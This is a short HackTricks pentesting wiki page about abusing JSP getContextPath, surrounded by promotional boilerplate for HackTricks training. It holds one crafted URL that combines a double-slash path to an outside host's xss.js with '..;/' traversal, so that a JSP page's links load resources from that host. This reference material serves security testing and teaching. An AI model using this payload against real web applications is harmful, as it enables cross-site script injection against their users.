hacktricks/network-services-pentesting/pentesting-web/jsp.md
Carlos Polop 6e4ad0894d c
2024-07-19 11:08:05 +02:00

2.5 KiB

JSP

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

getContextPath abuse

Info from here.

 http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp

Accessing that web you may change all the links to request the information to rakeshmane.com:

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}